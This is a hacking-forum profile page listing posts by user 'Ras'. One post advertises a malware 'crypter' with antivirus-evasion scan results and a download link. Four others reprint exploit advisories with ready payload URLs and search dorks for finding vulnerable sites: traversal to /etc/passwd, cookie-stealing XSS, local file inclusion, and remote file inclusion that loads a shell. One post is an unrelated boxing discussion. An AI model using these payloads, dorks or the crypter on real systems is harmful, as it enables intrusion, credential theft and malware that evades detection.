Jump to content

Ras

Active Members
  • Posts

    1106
  • Joined

  • Last visited

  • Days Won

    1

Posts posted by Ras

  1. AhnLab-V3    2007.10.20.0    2007.10.19    -
    AntiVir 7.6.0.27 2007.10.19 -
    Authentium 4.93.8 2007.10.19 -
    Avast 4.7.1051.0 2007.10.19 -
    AVG 7.5.0.488 2007.10.19 -
    BitDefender 7.2 2007.10.20 -
    CAT-QuickHeal 9.00 2007.10.20 -
    ClamAV 0.91.2 2007.10.20 -
    DrWeb 4.44.0.09170 2007.10.20 -
    eSafe 7.0.15.0 2007.10.15 -
    eTrust-Vet 31.2.5225 2007.10.20 -
    Ewido 4.0 2007.10.20 -
    FileAdvisor 1 2007.10.20 -
    Fortinet 3.11.0.0 2007.10.19 -
    F-Prot 4.3.2.48 2007.10.19 -
    F-Secure 6.70.13030.0 2007.10.19 -
    Ikarus T3.1.1.12 2007.10.20 BehavesLikeWin32.ProcessHijack
    Kaspersky 7.0.0.125 2007.10.20 -
    McAfee 5145 2007.10.19 -
    Microsoft 1.2908 2007.10.20 -
    NOD32v2 2604 2007.10.19 -
    Norman 5.80.02 2007.10.19 -
    Panda 9.0.0.4 2007.10.20 Suspicious file
    Prevx1 V2 2007.10.20 -
    Rising 19.45.52.00 2007.10.20 -
    Sophos 4.22.0 2007.10.20 -
    Sunbelt 2.2.907.0 2007.10.20 -
    Symantec 10 2007.10.20 -
    TheHacker 6.2.9.100 2007.10.19 -
    VBA32 3.12.2.4 2007.10.19 Trojan-Downloader.Win32.Agent.brs
    VirusBuster 4.3.26:9 2007.10.20 -

    Nu am pus poza pt ca se deschide in CMD.

    Download: http://rapidshare.com/files/64002416/Celsius_Crypt__Private_Edition_.rar

  2.  WWWISIS (Search) Multiple Vulnerabilities
    # Download:
    # [url]http://bvsmodelo.bvsalud.org/php/level.php?lang=en&component=31&item=2[/url]
    # Bug found by JosS
    # Contact: sys-project[at]hotmail.com
    # Spanish Hackers Team
    # [url]www.spanish-hackers.com[/url]
    # d0rk: powered by WWWISIS
    #Stop lammer


    # Local File Disclosure Vulnerability:

    [url]http://server/cgi-bin/wxis.exe/iah/?IsisScript=[/url][file]
    [url]http://server/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd[/url]


    # Exploit In (XSS):

    [url]http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft?=i[/url]
    [url]http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft?=e[/url]
    ....

    [ i,e ... ] it is the language of script

    # Cross Siting Scripting:

    <script>alert(document.cookie)</script>


    //---------------------------------------\\

    Greetz To: All Hackers
    JosS!

  3.  	
    // Script Title: eLouai's Force Download

    // Home Script: [url]http://elouai.com/force-download.php[/url]

    // Vuln Type: Local File Inclusion / LFI

    // Discovered by: The_PitBull aNd iNs

    // Bug: <?php
    $filename = $_GET['file'];

    // PoC: [url]http://www.site.com/force-download.php?file=[/url][LFI]

    // D0rk: allinurl: force-download.php?file=

  4. Lucian Bute este noul campion al lumii la box (nush ce categorie), dupa ce l-a invins pe Alejandro Berrio prin K.O. M-am sculat special de la ora 5 ca sa ascult meciul la radio. Fantastic !

    Asta ne arata ca nu suntem un popor in totalitate de lenesi, idioti, nespalati, hoti, cum suntem vazuti in afara, ci avem si oameni care muncesc si ne reprezinta cu succes. M-am simtit mandru ca sunt roman, insa nu pt. prima data.

    Bravo Luciane !

    Meciul nu a fost pe ProTV? Tu l-ai ascultat la radio?

    Oricum... felicitari lui Lucian ;)

    EDIT

    BOX/ Lucian Bute a invins "The Scorpion" dupa 12 reprize!

    Romanul a devenit challenger la titlul mondial IBF

    img_77464.jpg

    Pugilistul roman Lucian Bute l-a invins la puncte pe australianul de origine cameruneza Sakio Bika in "finala aspirantilor" la titlul mondial al categoriei supermijlocie, versiunea IBF. In urma acestui succes, Bute a dobindit dreptul de a-l provoca pe campionul mondial al categoriei, columbianul Alejandro Berrio.

    Montreal, "Centre Bell", 9187 de spectatori:

    Bute b. p. Sakio "Scorpion" Bika

    Decizie unanima: 118-109, 118-109, 116-111.

    Sakio Bika a fost avertizat in runda a 11-a pentru o lovitura nepermisa (cu capul).

    Este a 20-a victorie din tot atitea posibile pentru Lucian Bute, 27 de ani. Si a fost una dintre cele mai dificile. Sakio Bika a deschis meciul cu mare curaj, cautind lovituri decisive - chiar in prima repriza, un croseu a atins arcada romanului.

    Bute a revenit repede si a dominat ostilitatile - la finalul celor 12 reprize, decizia i-a fost favorabila in unanimitate: toti cei trei arbitri judecatori l-au vazut cistigator.

  5. # Title : Knowledge Networking v.1.0.b Local File Inclusion Vulnerability

    # Description : Knowledge Networking v.1.0.b is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

    # Author : d3hydr8

    # Homepage : [url]http://www.darkc0de.com[/url]

    # Original Post :

    # Vuln : /index.php?file=[LFI]

    # Proof : [url]http://www.knowledgenet.org/index.php?file=../../../../../../../../../../etc/passwd[/url]

  6.  
    \ \\\|///
    \\ - - // Xmors Underground Group
    ( @ @ )
    ----oOOo--(_)-oOOo--------------------------------------------------
    Portal : WebDesktop 0.1
    Download : [url]http://downloads.sourceforge.net/pns-webdesktop/web[/url]
    Author : S.W.A.T.
    HomePage : [url]www.XmorS.CoM[/url]
    Type : Remote File Inclusion
    Y! ID : Svvateam
    E-Mail : [email]Svvateam@yahoo.com[/email] / [email]S.W.4.T@hackermail.com[/email]
    Dork :
    ----ooooO-----Ooooo--------------------------------------------------
    ( ) ( )
    \ ( ) /
    \_) (_/



    +-----------------------------------------------------------------------------------
    ----------+

    Vuln Code :

    include($wsk . ".wsk/" . $wsk . ".php");

    &&&&&&&&

    include($app . ".app/" . $frm . ".frm/" . $frm . ".php");

    +-----------------------------------------------------------------------------------
    ----------+
    +-----------------------------------------------------------------------------------
    ----------+

    Exploit :

    [url]http://[TARGET]/[/url][PATH]/apps/apps.php?app=[-Sh3ll-]
    [url]http://[TARGET]/[/url][PATH]/wsk/wsk.php?wsk=[-Sh3ll-]

×
×
  • Create New...